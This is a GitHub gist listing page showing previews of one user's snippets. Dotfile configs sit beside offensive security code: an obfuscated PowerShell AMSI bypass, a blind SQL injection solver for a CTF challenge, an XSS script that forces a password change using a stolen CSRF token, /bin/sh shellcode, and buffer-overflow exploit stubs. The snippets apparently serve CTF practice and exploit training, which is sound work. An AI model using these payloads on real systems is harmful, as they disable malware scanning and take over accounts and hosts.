Brendan Scarvell scarvell
scarvell
/ gist:c6cb6e07be0bb8517d412a1b11d36109
Created
October 20, 2021 08:01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| exec --no-startup-id vmware-user |
scarvell
/ circlespace-solver.py
Last active
September 25, 2020 02:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import requests, string, binascii, sys, time | |
| uuid = "04f614a4-fc01-11ea-b4a9-ca5544c5d70c" # replace with space uuid | |
| url = 'https://chal.duc.tf:30103/circle/{}/people'.format(uuid) | |
| #query = "select version()" | |
| query = "select cfg_value FROM the_cfg" | |
| flag = "" |
scarvell
/ gist:6c5c3ef1da48c79f1dc881a18480f462
Created
July 20, 2017 05:02
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This file has been auto-generated by i3-config-wizard(1). | |
| # It will not be overwritten, so edit it as you like. | |
| # | |
| # Should you change your keyboard layout some time, delete | |
| # this file and re-run i3-config-wizard(1). | |
| # | |
| # i3 config file (v4) | |
| # | |
| # Please see http://i3wm.org/docs/userguide.html for a complete reference! |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| var x = new XMLHttpRequest(); | |
| x.open("GET", "/lk", true); | |
| x.onreadystatechange = function() { | |
| if (x.readyState == XMLHttpRequest.DONE) { | |
| text = x.responseText; | |
| text = text.substr(text.indexOf('invisible">') + 'invisible">'.length); | |
| csrf = text.substr(0, text.indexOf('</p>')); | |
| newdata = JSON.stringify({'new_password':'QWERTYqwerty1',confirm_password:'QWERTYqwerty1','token':csrf}); | |
| y = new XMLHttpRequest(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| """ | |
| There is no ASLR for this challenge | |
| gdb-peda$ checksec | |
| CANARY : ENABLED | |
| FORTIFY : disabled | |
| NX : ENABLED | |
| PIE : disabled | |
| RELRO : FULL |
scarvell
/ gist:f4b7bf23a446fc91863e98fd7b1e6fb3
Created
February 19, 2017 06:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Xft.dpi: 109 | |
| Xft.hinting: true | |
| Xft.hintstyle: hintfull | |
| XTerm*renderFont: true | |
| XTerm*faceName: source code pro | |
| XTerm*faceSize: 12 |
scarvell
/ bin_sh_shellcode.py
Last active
November 7, 2016 03:52
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Shellcode for /bin/sh | |
| # Added \x31\xc0 (xor eax,eax) \x31\xd2 (xor edx, edx) at start to zero out eax, edx to fix a bug | |
| shellcode = "\x31\xc0\x31\xd2\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import struct | |
| def p(x): | |
| return struct.pack('<I', x) | |
| # We can't use 0x41 or 0x61 | |
| buffer = "B" * 212 | |
| buffer += p(0x8048650) # JMP ESP |
scarvell
/ exploit.py
Last active
October 20, 2016 04:04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Justin Steven's 101 binary exploit | |
| # | |
| import struct | |
| def p(s): | |
| return struct.pack('<I', s) | |
| shellcode = "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" |
NewerOlder